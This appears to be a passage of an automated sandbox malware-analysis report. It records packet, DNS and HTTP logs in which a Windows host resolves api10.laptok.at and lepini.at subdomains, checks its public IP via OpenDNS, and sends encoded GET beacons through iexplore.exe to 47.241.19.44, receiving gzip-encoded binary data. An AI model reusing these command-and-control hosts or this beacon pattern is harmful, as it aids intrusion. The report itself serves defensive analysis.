Nov 24, 2020 20:36:32.474008083 CET	49771	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:32.745637894 CET	80	49771	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:32.745822906 CET	49771	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:32.746280909 CET	49771	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:33.058547020 CET	80	49771	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:34.025243044 CET	80	49771	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:34.025470018 CET	49771	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:34.025592089 CET	49771	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:34.084419012 CET	49772	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:34.297108889 CET	80	49771	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:34.348922968 CET	80	49772	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:34.349505901 CET	49772	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:34.349790096 CET	49772	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:34.349812031 CET	49772	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:34.614296913 CET	80	49772	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:35.467319012 CET	80	49772	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:35.467648983 CET	49772	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:35.468257904 CET	49772	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:35.732811928 CET	80	49772	47.241.19.44	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2020 20:34:13.533107042 CET	49714	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:13.560318947 CET	53	49714	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:23.378046989 CET	58028	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:23.413829088 CET	53	58028	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:24.982620955 CET	53097	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:25.009572029 CET	53	53097	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:28.018004894 CET	49257	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:28.045131922 CET	53	49257	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:29.904697895 CET	62389	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:29.931906939 CET	53	62389	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:30.945687056 CET	49910	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:30.972739935 CET	53	49910	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:31.956492901 CET	55854	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:31.983611107 CET	53	55854	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:32.099657059 CET	64549	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:32.126741886 CET	53	64549	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:32.999923944 CET	63153	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:33.027041912 CET	53	63153	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:34.012279034 CET	52991	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:34.039252043 CET	53	52991	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:34.992656946 CET	53700	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:35.019730091 CET	53	53700	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:36.013046026 CET	51726	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:36.069915056 CET	53	51726	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:37.123130083 CET	56794	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:37.159025908 CET	53	56794	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:38.135881901 CET	56534	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:38.171236038 CET	53	56534	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:39.773144960 CET	56627	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:39.808950901 CET	53	56627	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:41.167246103 CET	56621	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:41.202810049 CET	53	56621	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:48.704874992 CET	63116	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:48.731828928 CET	53	63116	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:49.810161114 CET	64078	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:49.837342978 CET	53	64078	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:51.155292988 CET	64801	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:51.182472944 CET	53	64801	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:52.588660955 CET	61721	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:52.615896940 CET	53	61721	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:53.925753117 CET	51255	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:53.961416960 CET	53	51255	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:54.032825947 CET	61522	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:54.095695019 CET	53	61522	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:54.376102924 CET	52337	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:54.411653996 CET	53	52337	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:54.875458956 CET	55046	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:54.913110018 CET	53	55046	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:54.984100103 CET	49612	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:55.027966022 CET	53	49612	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:55.223490953 CET	49285	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:55.259056091 CET	53	49285	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:55.621079922 CET	50601	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:55.661634922 CET	53	50601	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:56.023658037 CET	60875	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:56.050753117 CET	53	60875	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:56.078949928 CET	56448	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:56.114445925 CET	53	56448	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:56.586137056 CET	59172	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:56.621627092 CET	53	59172	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:57.185034037 CET	62420	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:57.212193966 CET	53	62420	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:58.193654060 CET	60579	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:58.229302883 CET	53	60579	8.8.8.8	192.168.2.4
Nov 24, 2020 20:34:58.617978096 CET	50183	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:34:58.656008959 CET	53	50183	8.8.8.8	192.168.2.4
Nov 24, 2020 20:35:09.762855053 CET	61531	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:35:09.789949894 CET	53	61531	8.8.8.8	192.168.2.4
Nov 24, 2020 20:35:10.759701967 CET	61531	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:35:10.786729097 CET	53	61531	8.8.8.8	192.168.2.4
Nov 24, 2020 20:35:11.409133911 CET	49228	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:35:11.445939064 CET	53	49228	8.8.8.8	192.168.2.4
Nov 24, 2020 20:35:11.776591063 CET	61531	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:35:11.811992884 CET	53	61531	8.8.8.8	192.168.2.4
Nov 24, 2020 20:35:13.791517019 CET	61531	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:35:13.818541050 CET	53	61531	8.8.8.8	192.168.2.4
Nov 24, 2020 20:35:17.807395935 CET	61531	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:35:17.834475040 CET	53	61531	8.8.8.8	192.168.2.4
Nov 24, 2020 20:35:24.219224930 CET	59794	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:35:24.246233940 CET	53	59794	8.8.8.8	192.168.2.4
Nov 24, 2020 20:35:26.075368881 CET	55916	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:35:26.112325907 CET	53	55916	8.8.8.8	192.168.2.4
Nov 24, 2020 20:35:26.972171068 CET	52752	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:35:27.306971073 CET	53	52752	8.8.8.8	192.168.2.4
Nov 24, 2020 20:35:32.034512043 CET	60542	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:35:32.070224047 CET	53	60542	8.8.8.8	192.168.2.4
Nov 24, 2020 20:35:41.276520967 CET	60689	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:35:41.303740025 CET	53	60689	8.8.8.8	192.168.2.4
Nov 24, 2020 20:35:44.833215952 CET	64206	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:35:44.868624926 CET	53	64206	8.8.8.8	192.168.2.4
Nov 24, 2020 20:36:23.735505104 CET	50904	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:36:23.771503925 CET	53	50904	8.8.8.8	192.168.2.4
Nov 24, 2020 20:36:31.473738909 CET	57525	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:36:31.500720024 CET	53	57525	8.8.8.8	192.168.2.4
Nov 24, 2020 20:36:31.507250071 CET	57526	53	192.168.2.4	208.67.222.222
Nov 24, 2020 20:36:31.523708105 CET	53	57526	208.67.222.222	192.168.2.4
Nov 24, 2020 20:36:31.526408911 CET	57527	53	192.168.2.4	208.67.222.222
Nov 24, 2020 20:36:31.542952061 CET	53	57527	208.67.222.222	192.168.2.4
Nov 24, 2020 20:36:31.565710068 CET	57528	53	192.168.2.4	208.67.222.222
Nov 24, 2020 20:36:31.582151890 CET	53	57528	208.67.222.222	192.168.2.4
Nov 24, 2020 20:36:32.435195923 CET	53814	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:36:32.472851038 CET	53	53814	8.8.8.8	192.168.2.4
Nov 24, 2020 20:36:34.044433117 CET	53418	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:36:34.080185890 CET	53	53418	8.8.8.8	192.168.2.4
Nov 24, 2020 20:38:53.140791893 CET	62833	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:38:53.176465034 CET	53	62833	8.8.8.8	192.168.2.4
Nov 24, 2020 20:38:53.963383913 CET	59260	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:38:54.003950119 CET	53	59260	8.8.8.8	192.168.2.4
Nov 24, 2020 20:38:54.632116079 CET	49944	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:38:54.669934034 CET	53	49944	8.8.8.8	192.168.2.4
Nov 24, 2020 20:38:55.021239042 CET	63300	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:38:55.056843996 CET	53	63300	8.8.8.8	192.168.2.4
Nov 24, 2020 20:38:55.203542948 CET	61449	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:38:55.230699062 CET	53	61449	8.8.8.8	192.168.2.4
Nov 24, 2020 20:39:13.103482008 CET	51275	53	192.168.2.4	8.8.8.8
Nov 24, 2020 20:39:13.130712986 CET	53	51275	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 24, 2020 20:34:41.167246103 CET	192.168.2.4	8.8.8.8	0x316c	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Nov 24, 2020 20:35:26.972171068 CET	192.168.2.4	8.8.8.8	0x54aa	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Nov 24, 2020 20:35:32.034512043 CET	192.168.2.4	8.8.8.8	0x72ba	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Nov 24, 2020 20:36:23.735505104 CET	192.168.2.4	8.8.8.8	0x4693	Standard query (0)	c56.lepini.at	A (IP address)	IN (0x0001)
Nov 24, 2020 20:36:31.473738909 CET	192.168.2.4	8.8.8.8	0x17ea	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Nov 24, 2020 20:36:31.507250071 CET	192.168.2.4	208.67.222.222	0x1	Standard query (0)	222.222.67.208.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Nov 24, 2020 20:36:31.526408911 CET	192.168.2.4	208.67.222.222	0x2	Standard query (0)	myip.opendns.com	A (IP address)	IN (0x0001)
Nov 24, 2020 20:36:31.565710068 CET	192.168.2.4	208.67.222.222	0x3	Standard query (0)	myip.opendns.com	28	IN (0x0001)
Nov 24, 2020 20:36:32.435195923 CET	192.168.2.4	8.8.8.8	0x1dd2	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Nov 24, 2020 20:36:34.044433117 CET	192.168.2.4	8.8.8.8	0x124f	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 24, 2020 20:34:41.202810049 CET	8.8.8.8	192.168.2.4	0x316c	No error (0)	api10.laptok.at		47.241.19.44	A (IP address)	IN (0x0001)
Nov 24, 2020 20:35:27.306971073 CET	8.8.8.8	192.168.2.4	0x54aa	No error (0)	api10.laptok.at		47.241.19.44	A (IP address)	IN (0x0001)
Nov 24, 2020 20:35:32.070224047 CET	8.8.8.8	192.168.2.4	0x72ba	No error (0)	api10.laptok.at		47.241.19.44	A (IP address)	IN (0x0001)
Nov 24, 2020 20:36:23.771503925 CET	8.8.8.8	192.168.2.4	0x4693	No error (0)	c56.lepini.at		47.241.19.44	A (IP address)	IN (0x0001)
Nov 24, 2020 20:36:31.500720024 CET	8.8.8.8	192.168.2.4	0x17ea	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Nov 24, 2020 20:36:31.523708105 CET	208.67.222.222	192.168.2.4	0x1	No error (0)	222.222.67.208.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Nov 24, 2020 20:36:31.542952061 CET	208.67.222.222	192.168.2.4	0x2	No error (0)	myip.opendns.com		84.17.52.25	A (IP address)	IN (0x0001)
Nov 24, 2020 20:36:31.582151890 CET	208.67.222.222	192.168.2.4	0x3	Name error (3)	myip.opendns.com	none	none	28	IN (0x0001)
Nov 24, 2020 20:36:32.472851038 CET	8.8.8.8	192.168.2.4	0x1dd2	No error (0)	api3.lepini.at		47.241.19.44	A (IP address)	IN (0x0001)
Nov 24, 2020 20:36:34.080185890 CET	8.8.8.8	192.168.2.4	0x124f	No error (0)	api3.lepini.at		47.241.19.44	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api10.laptok.at

c56.lepini.at

api3.lepini.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49740	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2020 20:34:41.512365103 CET	758	OUT	GET /api1/wRVY2NGdrRF/A_2Fha_2BTMf9b/Bkb0axFyVYg6CTiYCB0u_/2BNYoZUqIeFy6mXY/RsCAvo5yVPYtDbs/KEFb4oNdgILibF2Swr/I2w7rEJuT/Pp84EV24JCnppdQDLtg7/0g_2BJz5R_2FkQu9e_2/FGSaB0rJRCWjGvLRGTnGVc/Iu0pUH4kxZUPO/79c_2Bxp/zIxSbOn31EVZ_2FT_2BE4Ox/zrp24711fz/qBCMvOouQ_2B_2FBw/tevTXGEDmXVA/Fo3RVdsoq0v/QtV4LsUKm4P4d7/Q_0A_0Dq_2BFdmy3Ge3KN/bxiA2odSfTOC3fY6/QHvvQODRC/J_2BkRbDk_2F/bf HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Nov 24, 2020 20:34:42.636598110 CET	759	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Nov 2020 19:34:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a c5 6e ec 40 10 45 3f c8 0b 33 2d cd cc ec 9d 71 cc cc 5f ff f2 a4 28 8a 94 4c c6 ee ae aa 7b 8e a7 73 8e 1f 25 9c 00 53 49 e5 26 0d 27 5f 16 a3 50 98 10 60 e6 36 9e 39 15 17 5d 05 6b 9d 70 5f 59 26 3e 2a 8a 9e ba b2 f1 6f 1f 14 7a 72 d4 f6 71 67 86 8d aa 37 b1 1a c0 b9 c6 3c f7 e7 df 9c d3 c5 0a a2 d9 2b 76 b5 f0 db a8 76 0d ad 2e db ba ca 83 d1 5f d6 a7 de c0 e2 7d e2 cf 8f 7b 0e 40 a1 15 12 ce cf 9a cb 89 4b 9b e1 ca 6c fa 31 58 ac 4e f9 e8 7e 8c c1 7e fc 98 7e 57 8b c3 b4 a8 2f 45 a9 9b aa 2f b1 46 c9 c6 e4 56 b5 30 ee cd a8 9f f9 a0 c3 3a 34 ed 8e fd 0e d5 7e 78 7b d1 aa 1e a6 19 d3 c4 4f d0 01 76 df 2a e6 74 d5 d1 ad d6 94 38 c5 b5 a2 6d 8c 99 c3 35 2b e4 cd 3a c0 7e 76 e7 2d 08 c4 e3 ac 58 ff 5d b4 12 72 a2 b3 00 0a 7d 9c 26 b5 52 2b d9 28 2a 21 2e 6c 61 5e e7 e1 a0 5a 4c 50 04 2a 3b 8d 76 2d 71 cf 6e d5 62 58 85 08 89 c9 71 71 b4 5f 80 b7 e8 01 25 b1 8c 61 e8 d7 e0 d9 2d e7 3d 2a 94 ac 7a 9c c3 74 98 1a 1f 06 99 2c a2 de 51 e4 32 85 50 db d9 80 0e cc 22 c8 84 25 8e 2f a7 9e 95 61 3d 3f 1a a0 ec 44 9c ab 95 fe 70 db 4f 60 73 d0 89 32 9d f0 42 4a 66 17 be 70 04 7b 2b 12 de fa a6 8e 1f 29 c6 37 87 4f a3 88 4b 62 b4 87 ad e5 bf 1b 34 6f 62 55 32 65 ba 37 d5 01 37 4b 11 b6 54 e2 7b ff 78 35 69 bb 98 3e 93 d7 1f 49 68 0d cb b4 0e ca 9a 13 20 c3 53 80 90 3c b4 58 a0 c6 e0 94 ea 01 30 64 70 9a 95 a0 b0 18 3d 34 c7 c8 85 9c 6d fc 74 e5 ee d4 43 91 bf 76 15 d8 62 4e 6e f1 de 42 fd 88 58 3d b3 8c c6 87 e3 97 58 5a 2e 3d 59 99 3a b4 52 8b 66 b8 79 c2 fd b8 6b d2 b3 69 31 49 27 22 1c 4b b4 70 b0 b6 83 75 a2 ab 56 0c 7e f0 50 0d 5f 67 e2 f6 70 5e 42 14 22 32 01 dd 2b 44 a8 93 3a 50 78 29 46 3c 5b 17 7e 77 81 bb 47 a1 64 12 7e fe a1 c0 77 56 21 48 fc f5 c8 2d b8 d3 9c 4b 57 a0 ab 0d 0f 8b 66 fe 0e 3f 9f 7b 65 3a e0 3c 84 5b 41 33 f8 04 c6 95 3d 2b e5 a6 84 25 ef f9 e5 cb 41 54 98 dc 90 d9 fe 96 d5 10 41 4d 8d f1 bb 55 f1 75 a6 1f e7 3c 56 e3 06 fc 04 e5 d8 f4 6c b1 fb 21 dd cf f1 8e 99 79 78 ac f5 97 b9 03 2d 8c d9 76 0c bd 6b 74 5e 91 30 04 73 a4 1e 5b 78 bf 8f 67 9e 5f 7a bc fe 86 f6 8e a3 ee c5 85 ad 3f af 6b 42 3e a2 fa c8 22 88 67 a4 4e 10 95 49 cf 03 f5 b8 41 d9 ed 75 dd ea 98 05 3d 2d aa 43 8b be d0 f5 63 a6 aa fc 96 cf ba 60 02 fb 8a 92 16 72 cb e0 cc 2b 7d 33 02 bb 66 0b 54 2a 60 4c cd c3 9a a0 cd ea 94 92 79 76 71 51 ea 42 30 30 d5 31 3e 87 78 c1 45 26 75 04 32 d9 17 14 f6 26 08 e3 a5 e1 3e f9 c1 71 43 04 c3 a5 a5 79 3b 75 76 75 a4 29 f7 cc 98 be d1 c4 3b a1 6d 9b 88 9f 38 d3 96 d6 78 75 06 60 1f 86 57 3d 21 64 6c c0 e6 c0 da c3 1e c5 a1 c6 a9 74 bb d3 02 48 e5 bc 88 b8 98 09 5a 3b 80 59 83 8b 32 24 72 b7 21 d6 49 e2 0c 35 75 8e 2a 15 0f 8d 65 92 f6 8d 57 2c 46 98 42 6e 78 69 62 23 86 8a ee eb 25 a3 13 89 e7 f8 36 a3 65 ae 25 25 68 97 ce ec 5f f5 e0 a7 95 89 68 73 b8 a2 0c 68 26 e2 f3 33 a2 7d 45 04 97 d7 48 6c 1b 4b 0d b9 89 2f 83 78 11 6d 47 c4 27 46 bd f6 ef 3a 1d 79 bf 46 6b 7c fa 7e 57 84 53 f9 05 90 77 2f 10 66 c8 e8 22 35 69 b8 e3 b2 9e 49 58 81 dd e1 9d aa 6b 39 bf 63 e5 d0 7b 42 fb db e2 49 97 47 8e b6 d8 cb b7 a2 f9 e8 4a 18 75 2c 03 70 25 8b f7 bb 2a cc 91 79 7d 3e 63 87 97 12 ab 78 ba Data Ascii: 2000n@E?3-q_(L{s%SI&'_P`69]kp_Y&>ozrqg7<+vv._}{@Kl1XN~~~W/E/FV0:4~x{Ovt8m5+:~v-X]r}&R+(!.la^ZLP;v-qnbXqq_%a-=zt,Q2P"%/a=?DpO`s2BJfp{+)7OKb4obU2e77KT{x5i>Ih S<X0dp=4mtCvbNnBX=XZ.=Y:Rfyki1I'"KpuV~P_gp^B"2+D:Px)F<[~wGd~wV!H-KWf?{e:<[A3=+%ATAMUu<Vl!yx-vkt^0s[xg_z?kB>"gNIAu=-Cc`r+}3fT`LyvqQB001>xE&u2&>qCy;uvu);m8xu`W=!dltHZ;Y2$r!I5ueW,FBnxib#%6e%%h_hsh&3}EHlK/xmG'F:yFk\|~WSw/f"5iIXk9c{BIGJu,p%y}>cx
Nov 24, 2020 20:34:42.636662960 CET	761	IN	Data Raw: eb e8 9f e6 74 d9 30 07 a9 f0 22 1f c2 a0 e4 ea 87 63 cf 04 d2 5d 60 f0 ad 9a 96 ea 60 d7 79 3d 5d 90 e3 8b d5 15 17 f5 12 bf b2 82 3b 53 05 3e cb c3 36 4a c3 5c 19 fe 12 d4 a3 c7 fc 4c 3b 21 15 64 74 15 bf 4d c1 39 3a 52 06 21 cb 79 50 e4 a6 54 Data Ascii: t0"c]``y=];S>6J\L;!dtM9:R!yPT{Wl13ZFx\|&`J6H2ib/xY~ZAx>={92O-FY(b0/VD-,<C/:#k@$t$HRp
Nov 24, 2020 20:34:42.636694908 CET	762	IN	Data Raw: a8 d0 a4 5e 5f 68 ca 6f c6 76 bf b4 dd da d2 e8 57 c7 e8 ce 95 7a c6 ad 82 89 d1 3c a2 5d 40 87 64 70 a7 d0 a8 59 48 0f 9f 4b ef f3 f5 25 ae 73 9e 18 65 48 5e 5b cc 89 5f 44 61 e2 74 48 7f 77 ef 52 f5 4a f5 1b 73 6a 94 4e b5 f6 ce bd 49 62 27 45 Data Ascii: ^_hovWz<]@dpYHK%seH^[_DatHwRJsjNIb'Em8n~\^1KWN}t=`YG8X!zZ;w]8ogMHa({4``fr`Fn"Q+]bgJs\8
Nov 24, 2020 20:34:42.636724949 CET	763	IN	Data Raw: 9a 44 3c f4 c8 ff a0 58 71 a4 86 1a 84 6d 90 68 5e 14 f9 d9 e2 b4 9f 5d 53 f9 c5 be a5 94 f6 b3 86 f2 cb d1 b7 f9 e5 25 ed f8 d6 e3 3c 90 9b ea fa bc 39 2b e0 6e ec fe cc 34 67 98 fe fc f2 2c ff c8 f0 c5 a8 db 61 a4 c2 f6 8d 3f 58 22 4a 4e 83 04 Data Ascii: D<Xqmh^]S%<9+n4g,a?X"JN58q=-on}<Ek*nUS.e}&zKE1i(P]_f&XWShvYHavGqCv{Ghd"%T7D?\\c=jIPD5Y7[
Nov 24, 2020 20:34:42.636758089 CET	765	IN	Data Raw: e2 1d 44 59 23 15 ee 27 a0 77 bb 99 d6 62 be 10 26 fd 2e ff 87 5d e0 cf 09 63 c5 fa 15 38 2c 9a 2b e4 77 4c 4a ae cd 9f 7e ab 1b d9 fa f1 6e 41 3f aa cb 9b 4f 35 ed 6b 60 7c 10 e0 46 9a 94 87 85 cf c2 5d fe 5b 2d c2 a9 ec 35 f7 6e e3 a0 a7 1b be Data Ascii: DY#'wb&.]c8,+wLJ~nA?O5k`\|F][-5nkmb>;snnzF:?~o6V8bu/=?!W*KkgFhDyzj[fz?r6Vg!Wp_kj?<<wOSD"s&U
Nov 24, 2020 20:34:42.636789083 CET	766	IN	Data Raw: bf 7f 2a a0 14 61 30 e4 1d 05 12 27 be 1e 59 07 df d1 fe f8 1d 39 a4 03 0a 90 9d 8f f3 3f ff 47 50 af 36 ef 5c de 42 27 c4 04 a5 b3 7f a0 9c c5 0e a3 7c e4 a4 15 1c d2 e5 8a 68 cd 5a 88 5c f7 9f ed 2b 50 97 5f 07 0a 9b ef 7c 95 de de bc 7d 03 d3 Data Ascii: *a0'Y9?GP6\B'\|hZ\+P_\|}v@pcb:lQ b2Y=+d-!{Me}<pwZ JY%\|I9Ua&3a17/!s$S)%OyS1!4>2amafu?
Nov 24, 2020 20:34:42.675457954 CET	768	IN	Data Raw: 32 99 c8 a9 79 80 13 4e 13 20 e5 f3 ad 94 85 fb 44 80 00 d5 6d b1 be 24 ae 51 8f d3 e7 da a6 50 6a 15 62 62 d0 8f c6 bf 5b f8 fb 0b 10 de 2b 50 6a 24 e4 f4 ca da c9 38 45 e6 e9 ff 89 7f 30 47 a6 75 4f dc 81 2a 0b 0e 5e fc 07 09 82 c4 a4 43 90 e9 Data Ascii: 2yN Dm$QPjbb[+Pj$8E0GuO*^C;\=.>]j`;AhED8/XGl^=2?t!,aXgg=Jpi;Vye<m+p+a"TH{{_t-&
Nov 24, 2020 20:34:42.675483942 CET	769	IN	Data Raw: 41 5e 99 f9 37 46 42 38 29 84 50 91 80 b7 0f fe 50 2b bc d0 17 5e 2f 75 62 a5 21 e1 54 3c 6f fe 02 0b e4 a3 26 5c d7 65 83 5c a8 d2 32 2c 03 4c 80 a5 10 5a df 0c e7 ad f2 6e 76 fe 32 a5 48 37 63 e1 32 cc 91 63 ec d4 1e 5d 23 92 13 64 90 1b 9c b5 Data Ascii: A^7FB8)PP+^/ub!T<o&\e\2,LZnv2H7c2c]#dhI\|fXN`YQPW\|eI!o}^@6\|eeuW7P;"2@r5JsI^.d#lq"ifo^'CJ^l=wd4dtxOQ]i
Nov 24, 2020 20:34:42.675501108 CET	770	IN	Data Raw: f4 93 56 1c d2 f0 e7 88 9f e0 6c 8d a3 a8 96 6b 1a 1c 02 9e 95 3e b5 05 56 c3 4b a3 bb c1 84 84 7a 8c 4d 7b ed 11 f6 48 ba ef 75 d4 e4 7b fc 86 02 e2 08 13 20 16 9e e9 e0 11 cd 65 88 5c 07 4d 31 78 64 1f e9 c9 ec 1d 28 1b ea 43 d5 da 45 22 8d 40 Data Ascii: Vlk>VKzM{Hu{ e\M1xd(CE"@"{g6ibp%m;S/:k!3K9O?[~q\|l ]L)/;~[R`NMFgy#Z6Ay&.&cZyC+zsON^wCGw5
Nov 24, 2020 20:34:42.675515890 CET	772	IN	Data Raw: 58 a2 25 c3 1f 98 85 8d 27 03 ba b6 20 f8 eb f4 64 91 2b 1f fc 14 c3 44 9e b4 7c c6 92 97 78 d1 8f 60 fb ac fe a2 a1 59 85 b5 12 ff 3f 68 29 b9 f5 83 65 d7 e3 c9 77 32 25 0d af 3c d6 a8 d2 09 85 7e 19 a2 48 06 c1 a7 02 f0 7d 85 df af eb c5 32 d0 Data Ascii: X%' d+D\|x`Y?h)ew2%<~H}2t![1 Z%i}M[;rU>CswJ4\YSQbu],o&:SxpNB'G;M8T\|b]Pc?E$P2fpRK^i!9b
Nov 24, 2020 20:34:42.913803101 CET	773	IN	Data Raw: 40 9a b4 c8 19 7d 97 f2 1b 22 01 ad f6 cf 7c 00 e7 e3 a3 80 02 14 90 b8 d6 79 18 72 9e e2 26 87 6f 0a b6 5d a6 6d 92 c6 88 c0 2d b9 19 f9 bf 1c 35 05 d4 dc 48 44 25 46 28 ff 63 84 ce 94 43 c2 20 4f 45 71 09 86 bd 7c c9 b8 c7 4f e0 4f e9 3d 0a 8c Data Ascii: @}"\|yr&o]m-5HD%F(cC OEq\|OO=>\|&J$XEL\Q\|-Xfu+&4_CsOM\9T'a'TnAxb>p#\|STx`xKW%^knX!YS$=EQ4^/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49739	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
